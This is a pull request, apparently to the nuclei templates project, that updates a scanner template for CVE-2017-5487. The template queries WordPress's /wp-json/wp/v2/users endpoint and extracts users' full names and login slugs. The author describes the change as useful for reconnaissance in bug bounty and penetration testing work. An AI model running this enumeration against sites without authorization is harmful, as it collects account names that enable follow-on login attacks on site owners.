### PR TITLE
Added extractor for wordpress login names

### DIFF
--- a/cves/2017/CVE-2017-5487.yaml
+++ b/cves/2017/CVE-2017-5487.yaml
@@ -40,7 +40,16 @@ requests:
         condition: and
     extractors:
       - type: json
+        part: body
+        name: "Full Names"
         json:
           - '.[].name'
+      - type: json
+        part: body
+        name: "Login Names"
+        json:
+          - '.[] | .slug'
 
-# Enahnced by mp 03/31/2022
+# Enhanced by dr0pd34d 05/27/2022
+
+

--- a/cves/2017/CVE-2017-5487.yaml
+++ b/cves/2017/CVE-2017-5487.yaml
@@ -2,7 +2,7 @@ id: CVE-2017-5487
 
 info:
   name: WordPress Core < 4.7.1 - Username Enumeration
-  author: Manas_Harsh,daffainfo,geeknik
+  author: Manas_Harsh,daffainfo,geeknik,dr0pd34d
   severity: medium
   description: WordPress Core < 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
   reference:
@@ -15,41 +15,41 @@ info:
     cvss-score: 5.3
     cve-id: CVE-2017-5487
     cwe-id: CWE-200
-  tags: cve,cve2017,wordpress
+  metadata:
+    verified: true
+    shodan-query: http.component:"WordPress"
+  tags: cve,cve2017,wordpress,wp
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/wp-json/wp/v2/users/"
       - "{{BaseURL}}/?rest_route=/wp/v2/users/"
+
     stop-at-first-match: true
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
+
       - type: word
-        part: header
-        words:
-          - "application/json"
-      - type: word
+        part: body
         words:
           - '"id":'
           - '"name":'
           - '"avatar_urls":'
         condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
+
     extractors:
       - type: json
         part: body
-        name: "Full Names"
-        json:
-          - '.[].name'
-      - type: json
-        part: body
-        name: "Login Names"
+        name: "usernames"
         json:
           - '.[] | .slug'
-
-# Enhanced by dr0pd34d 05/27/2022
-
-

--- a/cves/2017/CVE-2017-5487.yaml
+++ b/cves/2017/CVE-2017-5487.yaml
@@ -53,3 +53,4 @@ requests:
         name: "usernames"
         json:
           - '.[] | .slug'
+          - '.[].name'


### PR DESCRIPTION
Added an additional extractor to extract login names (slugs) from the output and split the extraction output to "Full Names" and "Login Names" which can be helpful for automation or recon of a bug bounty or pentest/red team target.

### Template / PR Information

- Updated CVE-2017-5487

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)